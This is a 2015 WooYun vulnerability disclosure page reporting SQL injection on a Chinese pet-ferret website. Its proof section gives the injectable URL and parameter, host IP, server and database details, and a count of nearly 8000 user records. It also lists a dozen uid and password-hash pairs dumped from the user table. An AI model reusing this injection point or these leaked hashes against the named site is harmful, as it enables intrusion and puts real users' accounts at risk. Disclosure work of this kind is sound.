当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100670

漏洞标题:某贵族宠物貂网站SQL注射可导致近8000用户信息泄露

相关厂商:某贵族宠物貂网站

漏洞作者: 雅柏菲卡

提交时间:2015-03-11 14:26

修复时间:2015-04-25 14:28

公开时间:2015-04-25 14:28

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

.....

详细说明:

.................

漏洞证明:

Target: 		http://event.angora.com.cn/vote.php?uid=1698
Host IP:		116.255.140.117
Web Server: 	Microsoft-IIS/6.0
Powered-by: 	PHP/5.2.1
Powered-by: 	ASP.NET
DB Server: 	MySQL
Resp. Time(avg):	2549 ms
Current User: 	angora_ucroot@localhost
Current DB: 	angora_event
System User: 	angora_ucroot@localhost
Host Name: 	A0008-1014001
Compile OS: 	Win32
Installation dir: 	D:\MySQL Server 5.1
DB User: 	'angora_ucroot'@'localhost'
Data Bases: 	information_schema
		angora_event
		angora_hd
		angora_home
		angora_homeenglish
		angora_ucenter
		angora_uchome
		angora_weibo
Count(*) of angora_ucenter.uc_members is 7992
Data Found: uid,password=1^77c20e60f7afdac630e5e58ffcce29e9
Data Found: uid,password=5^853afb30aeb62a1c435fee703ea35c6f
Data Found: uid,password=6^c27438a6445b42b74f3efb9c2cfde10d
Data Found: uid,password=4^6ce021e5b9f564fd325172206298b903
Data Found: uid,password=3^bd9fb46e7fefcc85273eb41c38ccfa64
Data Found: uid,password=8^ef3e8d19cddf828c3e432f4758ec03e4
Data Found: uid,password=2^f6cada00dd5ee4d1af336aaae25a2bd7
Data Found: uid,password=11^37677bc662745335eb138415ae48fa25
Data Found: uid,password=17^0f1af1a00aca82557c46775c77a0fb8d
Data Found: uid,password=14^36b678b4230818b884096d5bea5c5b4c
Data Found: uid,password=16^acdb0121fb21f91ca6faf0fbb2316cb8
Data Found: uid,password=13^680058fca586262c727d4a6da47752f0
以上为节选摘抄

修复方案:

...............

版权声明:转载请注明来源 雅柏菲卡@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝